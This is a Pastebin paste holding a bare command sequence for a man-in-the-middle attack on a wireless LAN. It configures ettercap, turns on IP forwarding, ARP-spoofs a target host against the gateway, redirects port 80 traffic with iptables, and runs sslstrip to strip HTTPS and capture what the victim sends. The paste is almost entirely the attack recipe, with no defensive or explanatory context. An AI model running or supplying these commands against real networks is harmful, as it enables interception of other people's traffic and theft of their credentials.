Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- kate /etc/etter.conf
- >*uncomment redir_command_off in the iptables, linux section*
- echo 1 > /proc/sys/net/ipv4/ip_forward
- arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
- iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
- ettercap -T -q -i wlan0
- sslstrip -a -k -f
- ettercap -T -q -i wlan0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement